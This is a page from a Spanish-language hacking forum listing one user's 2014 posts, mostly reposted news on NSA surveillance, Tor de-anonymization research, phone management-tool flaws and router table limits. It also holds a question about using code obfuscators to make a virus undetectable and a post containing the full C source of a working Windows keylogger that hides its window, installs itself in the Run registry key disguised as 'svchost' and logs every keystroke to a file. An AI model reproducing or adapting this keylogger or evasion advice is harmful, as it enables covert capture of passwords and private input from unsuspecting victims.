elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado:


  Mostrar Temas
Páginas: 1 2 3 4 5 6 7 [8] 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 ... 49
71  Foros Generales / Noticias / ¿El ciberespacio se queda sin espacio?: Internet alcanza ya un tamaño preocupa.. en: 14 Agosto 2014, 06:55 am
¿El ciberespacio se queda sin espacio?: Internet alcanza ya un tamaño preocupante

Expertos alertan que los problemas técnicos que han provocado esta semana la caída de eBay podrían estar vinculados con la falta de memoria de Internet y la sobrecarga de los routers.



Los problemas técnicos que han provocado caídas de sitios web como el portal de subastas eBay podrían hacerse habituales debido al crecimiento del tráfico de internet y a la falta del espacio de memoria virtual, informa 'The Telegraph' citando a expertos.

Se estima que estos fallos técnicos podrían acarrear pérdidas millonarias para la economía debido a las caídas de las ventas debido a que zonas de varios sitios web ya están totalmente 'llenas'.

Este martes eBay quedó inaccesible durante varias horas para los usuarios de Reino Unido, así como de otras partes de Europa y de algunos lugares de EE.UU. La cuenta de eBay en Twitter se llenó de quejas de comerciantes que usan la página web de la compañía para obtener beneficio y exigieron compensaciones por la pérdida de ventas.

"Se trata realmente de que los routers están sobrecargados debido al número creciente de dispositivos usados y al panorama de Internet cada vez más fragmentado en pequeñas redes", explica Joss Wright, experto del Instituto de Internet de Oxford. Los routers ya no soportan el crecimiento del tráfico al igual que "el cerebro humano no podría recordar todos los caminos secundarios de un largo viaje en coche", añade.

Los routers son dispositivos que almacenan las tablas de rutas en la memoria. Aunque cada router tiene un número distinto de rutas en su memoria, la mayoría está cerca de las 512.000. Los expertos estiman que esta cifra es el punto de ruptura que los routers no pueden sobrepasar.

James Gill, el jefe ejecutivo de la empresa 'GoSquard', considera que estos fallos técnicos podrían costar millones de dólares a grandes empresas como eBay y que se necesitaría mucho tiempo para actualizar su hardware. "Si este tipo de fallos se convierte en algo regular, entonces será un problema grave tanto para las empresas como para la economía en general", alerta.

http://actualidad.rt.com/ciencias/view/137072-expertos-internet-tamano-problemas-serios
72  Foros Generales / Noticias / Demandan a la NSA por el temor de que su exdirector venda información secreta en: 2 Agosto 2014, 07:45 am
La Agencia de Seguridad Nacional de EE.UU. (NSA) está siendo nuevamente objeto de demanda, esta vez por no facilitar los archivos sobre su antiguo director, cuya conducta es motivo de críticas.



Esta semana el periodista Jason Leopold presentó una denuncia contra la NSA, la cual se suma a una serie de demandas que han surgido desde que el excontratista de la CIA Edward Snowden desvelara el espionaje de EE.UU. sobre millones de personas y gobiernos en todo el mundo.

La denuncia del periodista se debe a que la agencia se ha negado a suministrar la situación financiera relacionada con su exdirector, el general Keith Alexander, quien ahora ofrece consultoría en seguridad cibernética a empresas por un valor de 1 millón de dólares al mes, según informó Motherboard.

Pero la NSA rechazó la petición de Leopold. En su demanda, que busca obligar la liberación de los documentos de Alexander, Leopold argumenta que están siendo retenidos ilegalmente. En virtud de la Ley de Ética Gubernamental de 1978, la NSA tiene "un deber obligatorio, no discrecional para suministrar los registros solicitados", dice el periodista en la denuncia.


El representante demócrata por el estado de Florida, Alan Grayson, expresó sus preocupaciones en una carta. "Escribo con preocupación por la posible revelación de información clasificada por parte del exdirector de la Agencia de Seguridad Nacional Keith Alexander".

"La revelación o el mal uso de información clasificada con fines de lucro es, como bien sabe el señor Alexander, un delito grave. Me pregunto cómo el Señor Alexander puede proporcionar cualquiera de los servicios que está ofreciendo a menos que divulgue o haga mal uso de la información, incluyendo las fuentes y métodos clasificados extremadamente sensibles. Sin la información clasificada que adquirió en su anterior posición, literalmente, no tendría nada que ofrecer".

http://actualidad.rt.com/actualidad/view/135764-nsa-demanda-director-vender-informacion-snowden
73  Foros Generales / Noticias / 'Hackers' pueden controlar su celular mediante una herramienta ya integrada en: 2 Agosto 2014, 07:33 am
Investigadores descubrieron en una herramienta integrada en un gran número de 'smartphones' vulnerabilidades que permitirían a los 'hackers' instalar un código malicioso y tomar el control del dispositivo.



Las vulnerabilidades se encuentran dentro de unas herramientas de gestión que los fabricantes y los operadores integraron en los teléfonos y tabletas para configurarlos de forma remota. Aunque algunos diseñan su propia herramienta, la mayoría utiliza una desarrollada por un tercer vendedor específico al que los investigadores, Mathew Solnik y Marc Blanchou de Accuvant Labs, no identificarán hasta que presenten sus pruebas la próxima semana en una conferencia de seguridad en Las Vegas, informa Wired.

Los operadores usan la herramienta de gestión para enviar remotamente las actualizaciones de firmware, configurar los teléfonos para la itinerancia  o bloquear los dispositivos a los proveedores de servicios específicos. Pueden elegir en la herramienta las funciones básicas o solicitar otras adicionales. Solnik encontró que algunos teléfonos tienen las características para limpiar de forma remota el dispositivo, cambiar el PIN para el bloqueo de pantalla, configurar y desactivar las aplicaciones etc. Y los sistemas dan al operador la opción de hacer los cambios sin preguntar al consumidor, observa el medio.

Asimismo, cuantas más características de la herramienta de gestión ofrece el operador, más puede hacer un atacante. Como mínimo, todos los dispositivos examinados permitirían a un 'hacker' cambiar toda la funcionalidad de la red celular y controlar las actualizaciones de firmware. Incluso los teléfonos que utilizan únicamente el sistema de gestión más básico tienen vulnerabilidades de memoria que permitirían a un agresor ejecutar un código o instalar aplicaciones maliciosas, de acuerdo con los autores del estudio.

Según los investigadores, la herramienta se utiliza de alguna forma en más de 2.000 millones de teléfonos de todo el mundo. Las vulnerabilidades hasta ahora han sido encontradas en dispositivos de Android y BlackBerry y en un pequeño número de iPhones. Los dispositivos de Windows Mobile aún no se han comprobado.

Los autores del estudio dicen que por ahora no hay señales de que alguien se haya aprovechado de las vulnerabilidades, y la compañía que hace la herramienta anunció que ha emitido una solución que resolvería el problema.

http://actualidad.rt.com/actualidad/view/135753-hackers-controlar-movil-herramienta-integrada
74  Programación / Ingeniería Inversa / Métodos anti ingeniería inversa que se puedan usar para hacer virus indetectable en: 1 Agosto 2014, 19:15 pm
Estuve leendo un libro de 2005 sobre ingeniería inversa a raíz de eso surge mi pregunta. Aun funcionan los ofuscadores de código, como EXECryptor, StarForce suite  para hacer indetectable un virus, o la ofuscación del código fuente tendría que ser manual, estuve buscando en google y no encontré nada sobre el tema, el themida como todos sabemos ya no funciona, que hay de los programas anteriormente mencionados?
 
En libros actuales de 2014, sobre ingeniería inversa, aun se menciona que el método de ofuscación de código, puede ser usado en malwares
75  Programación / Programación C/C++ / En que directorio guarda los datos recolectados este keylogger en: 31 Julio 2014, 20:31 pm
Este es el codigo fuente del keylogger

Citar
#include <windows.h>
#include <stdio.h>
#include <winuser.h>
#include <windowsx.h>

#define BUFSIZE 80

int test_key(void);
int create_key(char *);
int get_keys(void);


int main(void)
{
   HWND stealth; /*creating stealth (window is not visible)*/
   AllocConsole();
   stealth=FindWindowA("ConsoleWindowClass",NULL);
   ShowWindow(stealth,0);
 
   int test,create;
   test=test_key();/*check if key is available for opening*/
       
   if (test==2)/*create key*/
   {
       char *path="c:\\%windir%\\svchost.exe";/*the path in which the file needs to be*/
       create=create_key(path);
         
   }
       
 
   int t=get_keys();
   
   return t;


int get_keys(void)
{
           short character;
             while(1)
             {
                    sleep(10);/*to prevent 100% cpu usage*/
                    for(character=8;character<=222;character++)
                    {
                        if(GetAsyncKeyState(character)==-32767)
                        { 
                           
                            FILE *file;
                            file=fopen("svchost.log","a+");
                            if(file==NULL)
                            {
                                    return 1;
                            }           
                            if(file!=NULL)
                            {       
                                    if((character>=39)&&(character<=64))
                                    {
                                          fputc(character,file);
                                          fclose(file);
                                          break;
                                    }       
                                    else if((character>64)&&(character<91))
                                    {
                                          character+=32;
                                          fputc(character,file);
                                          fclose(file);
                                          break;
                                    }
                                    else
                                    {
                                        switch(character)
                                        {
                                              case VK_SPACE:
                                              fputc(' ',file);
                                              fclose(file);
                                              break;   
                                              case VK_SHIFT:
                                              fputs("[SHIFT]",file);
                                              fclose(file);
                                              break;                                           
                                              case VK_RETURN:
                                              fputs("\n[ENTER]",file);
                                              fclose(file);
                                              break;
                                              case VK_BACK:
                                              fputs("[BACKSPACE]",file);
                                              fclose(file);
                                              break;
                                              case VK_TAB:
                                              fputs("[TAB]",file);
                                              fclose(file);
                                              break;
                                              case VK_CONTROL:
                                              fputs("[CTRL]",file);
                                              fclose(file);
                                              break;   
                                              case VK_DELETE:
                                              fputs("[DEL]",file);
                                              fclose(file);
                                              break;
                                              case VK_OEM_1:
                                              fputs("[;:]",file);
                                              fclose(file);
                                              break;
                                              case VK_OEM_2:
                                              fputs("[/?]",file);
                                              fclose(file);
                                              break;
                                              case VK_OEM_3:
                                              fputs("[`~]",file);
                                              fclose(file);
                                              break;
                                              case VK_OEM_4:
                                              fputs("[ [{ ]",file);
                                              fclose(file);
                                              break;
                                              case VK_OEM_5:
                                              fputs("[\\|]",file);
                                              fclose(file);
                                              break;                               
                                              case VK_OEM_6:
                                              fputs("[ ]} ]",file);
                                              fclose(file);
                                              break;
                                              case VK_OEM_7:
                                              fputs("['\"]",file);
                                              fclose(file);
                                              break;
                                              /*case VK_OEM_PLUS:
                                              fputc('+',file);
                                              fclose(file);
                                              break;
                                              case VK_OEM_COMMA:
                                              fputc(',',file);
                                              fclose(file);
                                              break;
                                              case VK_OEM_MINUS:
                                              fputc('-',file);
                                              fclose(file);
                                              break;
                                              case VK_OEM_PERIOD:
                                              fputc('.',file);
                                              fclose(file);
                                              break;*/
                                              case VK_NUMPAD0:
                                              fputc('0',file);
                                              fclose(file);
                                              break;
                                              case VK_NUMPAD1:
                                              fputc('1',file);
                                              fclose(file);
                                              break;
                                              case VK_NUMPAD2:
                                              fputc('2',file);
                                              fclose(file);
                                              break;
                                              case VK_NUMPAD3:
                                              fputc('3',file);
                                              fclose(file);
                                              break;
                                              case VK_NUMPAD4:
                                              fputc('4',file);
                                              fclose(file);
                                              break;
                                              case VK_NUMPAD5:
                                              fputc('5',file);
                                              fclose(file);
                                              break;
                                              case VK_NUMPAD6:
                                              fputc('6',file);
                                              fclose(file);
                                              break;
                                              case VK_NUMPAD7:
                                              fputc('7',file);
                                              fclose(file);
                                              break;
                                              case VK_NUMPAD8:
                                              fputc('8',file);
                                              fclose(file);
                                              break;
                                              case VK_NUMPAD9:
                                              fputc('9',file);
                                              fclose(file);
                                              break;
                                              case VK_CAPITAL:
                                              fputs("[CAPS LOCK]",file);
                                              fclose(file);
                                              break;
                                              default:
                                              fclose(file);
                                              break;
                                       }       
                                  }   
                             }       
                   }   
               }                 
                   
           }
           return EXIT_SUCCESS;                           
}                                               

int test_key(void)
{
   int check;
   HKEY hKey;
   char path[BUFSIZE];
   DWORD buf_length=BUFSIZE;
   int reg_key;
   
   reg_key=RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_QUERY_VALUE,&hKey);
   if(reg_key!=0)
   {   
       check=1;
       return check;
   }       
         
   reg_key=RegQueryValueEx(hKey,"svchost",NULL,NULL,(LPBYTE)path,&buf_length);
   
   if((reg_key!=0)||(buf_length>BUFSIZE))
       check=2;
   if(reg_key==0)
       check=0;
       
   RegCloseKey(hKey);
   return check; 
}
 
int create_key(char *path)

       int reg_key,check;
       
       HKEY hkey;
       
       reg_key=RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&hkey);
       if(reg_key==0)
       {
               RegSetValueEx((HKEY)hkey,"svchost",0,REG_SZ,(BYTE *)path,strlen(path));
               check=0;
               return check;
       }
       if(reg_key!=0)
               check=1;
               
       return check;
}

76  Programación / Programación General / Por que no me es posible compilar en backtrack usando codeblock IDE en: 30 Julio 2014, 01:20 am
Me estoy iniciando en el tema de la programación, estoy tratando de compilar C++ en backtrack 5 r3 de 32 bit, usando codeblock IDE 8.02 cuando doy click en compilar,  solo me crea un archivo de texto y en la ventana de Built log, solo me aparece un mensaje que dice Nothing to be done.

A que se debe este problema?
77  Foros Generales / Noticias / Alemania espiará a EE.UU. y Reino Unido por primera vez desde 1945 en: 26 Julio 2014, 02:31 am
La canciller Angela Merkel decide espiar a sus dos socios en la OTAN tras exigir al jefe de la estación de la CIA en Berlín que dejara Alemania.



Angela Merkel, ha anunciado que su país vigilará las acciones de los agentes de los servicios estadounidenses y británicos en su territorio, informa The Daily Mail.

La decisión de la canciller se considera una respuesta al escándalo estallado recientemente en Alemania tras conocerse que la Agencia de Seguridad Nacional de EE.UU. (NSA, por sus siglas en inglés) espiaba a los ciudadanos de la República Federal.
 
Después de hacerse público que el NSA escuchaba a escondidas el teléfono móvil de Merkel, la canciller exigió que el jefe de la CIA en Berlín abandonara el territorio alemán.
 
La agencia de inteligencia alemana (BND, por sus siglas en alemán) llevará a cabo estricta vigilancia de las acciones de los agentes estadounidenses en territorio alemán. Esta decisión marca el primer caso de la observación de la inteligencia aliada por parte de Alemania desde el 1945, cuando las autoridades de Alemania Occidental decidieron dar libertad a estos servicios.
 
Esta semana el presidente de los EE.UU., Barack Obama, envió al jefe del Gabinete de la Casa Blanca, Denis McDonough, y a la asesora para la lucha contra el terrorismo, Lisa Monaco, a Berlín. Oficiales de la Casa Blanca afirman que en la capital alemana abordaron asuntos de seguridad.
 
"Sólo a través de negociaciones y acuerdos se puede restablecer la confianza. Aseguraremos que esas negociaciones tengan lugar, pero por ahora no puedo dar ningún dato concreto", admitió Merkel. Sin embargo, la canciller alemana sostiene que Alemania y EE.UU. siguen siendo socios y "nada puede cambiarlo".
 
Entretanto, la Casa Blanca no ha hecho ningún comentario.
 
Merkel desmintió la posibilidad de conceder permiso al ex-agente del NSA Edward Snowden de refugiarse en Alemania.
 
Un funcionario de la Casa Blanca aseguró que la CIA no utilizaría programas de vacunación como fachada para actividades de inteligencia. La CIA afirma que no tiene intención de utilizar los materiales genéticos obtenidos en el marco de estos programas.   

http://actualidad.rt.com/actualidad/view/135049-alemania-eeuu-espionaje-escandalo-reinounido
78  Foros Generales / Noticias / "Al Qaeda planea un 11-S cibernético contra EE.UU." en: 26 Julio 2014, 02:14 am
Al Qaeda, algunos países y grupos criminales están planeando amplios ataques cibernéticos contra la infraestructura estadounidense que se podrían comparar con el 11-S, afirmó un alto funcionario de justicia de EE.UU.



"Estamos en el momento previo a un 11-S cibernético", dijo John Carlin, fiscal general adjunto de seguridad nacional, citado por el portal Washington Free Beacon.

En una conferencia sobre seguridad, Carlin mencionó que recientemente el líder de Al Qaeda, Ayman al Zawahiri, publicó un vídeo en el que señaló que la red terrorista planea ciberataques contra redes eléctricas y financieras de EE.UU.

Como otro ejemplo, el funcionario recordó una operación contra la petrolera estatal saudita Aramco, que dejó fuera de servicio unos 30.000 ordenadores que controlaban los elementos cruciales de la infraestructura energética del país.

El fiscal general adjunto también se refirió al grupo criminal Gameover Zeus, que las autoridades estadounidenses lograron desarticular este año, como un ejemplo de potenciales ataques.

Se trata de una red que difundía los virus Gameover Zeus (conocido también como GOZeus y P2PZeus), que robaba de los ordenadores información bancaria y otros datos confidenciales, y Cryptolocker, un virus que bloqueaba los ordenadores y exigía a las víctimas un pago a cambio de la contraseña para acceder a la máquina. 
 
"Si un grupo terrorista se hace con este tipo de acceso o capacidad, no pedirán dinero ni se tomarán tiempo para destruir los datos", resaltó Carlin llamando a una cooperación entre el sector público y privado para lidiar con la amenaza.

Respecto a ciertos Estados que pueden amenazar las redes estadounidenses, mencionó las acusaciones formales del Gobierno de EE.UU. presentadas contra cinco miembros del Ejército Popular de Liberación de China por el presunto robo de secretos de empresas privadas estadounidenses a través de medios cibernéticos. 
 
Carlin dijo que el Departamento de Justicia se enfrenta a los ataques cibernéticos con métodos similares a la lucha antiterrorista.

"Hemos pasado a vigilar mejor lo que está pasando respecto a la información que está siendo robada día y noche de las computadoras de los estadounidenses creativos e innovadores y usada por sus rivales en contra de las empresas estadounidenses", comentó. 

Describió el nuevo enfoque de "multifacético y estratégico", que debe trazar una "línea roja" para disuadir a otros países de realizar ataques cibernéticos.

"Cada vez les saldrá más caro realizar este tipo de actividad en suelo estadounidense hasta que el robo de datos cese", prometió el funcionario. 

http://actualidad.rt.com/actualidad/view/135024-qaeda-planean-ataque-cibernetico-eeuu-11s
79  Foros Generales / Sugerencias y dudas sobre el Foro / Por que bloquean los temas con varios comentarios en la sección de noticias en: 24 Julio 2014, 23:51 pm
No veo que exista algo que no lo permita, en las reglas del foro, por que cuando un tema tiene varios comentarios en la sección de noticias lo bloquean, y no permiten que se siga comentando, alguien me puede aclarar esa duda.
80  Foros Generales / Noticias / Aseguran haber creado un virus que revelaría la identidad de usuarios de tor en: 24 Julio 2014, 21:23 pm
Para algunos es un refugio de pedófilos, traficantes, drogadictos y sicarios. Para otros el único territorio para defensores de derechos humanos que luchan contra tiranías o periodistas que investigan a los poderosos. Pocos fenómenos generan interpretaciones tan opuestas en nuestros tiempos como la internet oscura o dark net.


La parte oscura de internet es un dolor de cabeza para las agencias de inteligencia.

En esta parte de la red, la información se mueve cifrada y antes de llegar a destino pasa por múltiples servidores que forman parte de redes de voluntarios. Cada paso remueve un nivel de cifrado hasta que el mensaje llega al destinatario, lo que hace muy difícil rastrear al autor. Una de las formas más populares para acceder a ella es descargar un navegador especial llamado Tor.

Los gobiernos y sus fuerzas de seguridad dicen que la mayoría de sus usuarios son criminales, pero sus defensores responden que simplemente están en contra de las regulaciones establecidas sobre la red y que el sueño original de sus creadores era una internet libre y anónima.
Pero más allá de sus diferencias, un elemento en común une a los que ingresan a este sector de la red: mantener su anonimato.
En esta lucha por mantener oculta la identidad de los internautas, los enemigos de la dark net dicen tener un arma nueva, un virus que promete revelar los secretos de este sector de la red.
Pero uno de los creadores del sistema que permite el anonimato de los usuarios asegura que el virus "no es el fin del mundo".
Y en el medio de este enfrentamiento se despliega una trama propia de una novela policial con conferencistas desaparecidos, filtraciones y desmentidos.


Los responsables de Tor dicen tener la situación bajo control.

Virus "interesante"

A comienzos de este mes, dos investigadores anunciaron sus planes de revelar una forma de combatir el anonimato en la internet oscura.
Alexander Volynkin y Michael McCor, dos expertos en seguridad del equipo de respuestas de emergencias informáticas de la Universidad Carnegie Mellon (CERT), tenían planeado mostrar su arma secreta en la conferencia Black Hat que iba a tener lugar en Las Vegas en agosto.
Sin embargo, un aviso publicado en el sitio de internet del evento indica ahora que los abogados de la universidad se han contactado con los organizadores de la conferencia para decirles que la presencia de Volynkin y McCor se ha cancelado.
"Desafortunadamente, el señor Volynkin no podrá hablar debido a que los materiales que iba a presentar no han sido aprobados aún por el Instituto de Ingeniería Informática de la Universidad Carnegie Mellon para su difusión pública", indica el mensaje.
Roger Dingledine, uno de los creadores de Tor, publicó luego un mensaje en el que señaló que Tor Project, la organización que suministra gratuitamente el programa informático para utilizar Tor, había sido "informalmente" informada de los descubrimientos que iban a ser revelados en el evento de Las Vegas.
"Creo que puedo manejar lo que ellos crearon y corregirlo", dijo Dingledine y añadió:
"Basados en nuestros planes actuales, instalaremos una reparación para contrarrestar este virus particular que encontraron. El virus es interesante, pero no es el fin del mundo".

Fallas de sistema


Los resultados de la investigación iban a ser revelados en Las Vegas.

Tor fue desarrollado originalmente por el Laboratorio de Investigación Naval de Estados Unidos y luego fue financiado por el grupo de derechos digitales Electronic Frontier Foundation, Google, la Fundación Nacional de Ciencia estadounidense, entre otros.
Lo utilizan desde funcionarios, militares y periodistas que quieren comunicarse con soplones, hasta personas comunes que simplemente no quieren que los rastreen cuando navegan por la red.
Pero también ha sido asociado con actividades ilegales, desde comprar heroína hasta contratar un sicario o descargar videos abusivos de menores.

Los investigadores habían prometido revelar cómo un pequeño dispositivo, con un valor de US$3.000, podía ser utilizado "para explotar fallas fundamentales en el diseño y la implementación de Tor" y mostrar las direcciones de internet de sus usuarios y los servidores de computadoras utilizados para esconder sus servicios.
"Lo sabemos porque lo hemos probado", añadieron.
Christopher Soghoian, un experto en tecnología de la Unión de Libertades Civiles de EE.UU., especuló que la Universidad Carnegie Mellon pudo haberse preocupado por demandas de usuarios de Tor que podían alegar que su privacidad había sido violada.
"Vigilar el tráfico de Tor es potencialmente una violación a varios estatutos federales criminales", escribió en un tuit Soghoian.
Sin embargo, una vocera de la universidad contactada por la BBC se limitó a decir que no tenían nada que agregar "al comunicado que ya se difundió por los organizadores de la conferencia Black Hat".

Buscando a Tor


El FBI es uno de los servicios de inteligencia que ha intentado ingresar a la internet oscura.

Aunque los detalles de las supuestas fallas de Tor aún no han salido al dominio público, sí se han conocido varios informes de las autoridades de distintos países por ingresar en este sistema.
La cadena de noticias alemana ARD informó que a comienzos de este mes, ciberespías de la Agencia Nacional de Seguridad (NSA por sus siglas en inglés) estaban vigilando dos servidores de Tor en Alemania para averiguar las direcciones de los usuarios que los utilizaban.
Un supuesta filtración de la agencia de seguridad británica GCHQ indicó por su parte que este servicio de inteligencia había desarrollado su propio navegador Tor.
Y en 2013, el FBI reconoció que una falla en el navegador Firefox le había permitido identificar usuarios de Tor en su esfuerzo por luchar contra la difusión de imágenes de pederastas divulgas en la red.


http://www.bbc.co.uk/mundo/noticias/2014/07/140724_internet_oscura_lucha_identidad_mz.shtml
Páginas: 1 2 3 4 5 6 7 [8] 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 ... 49
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines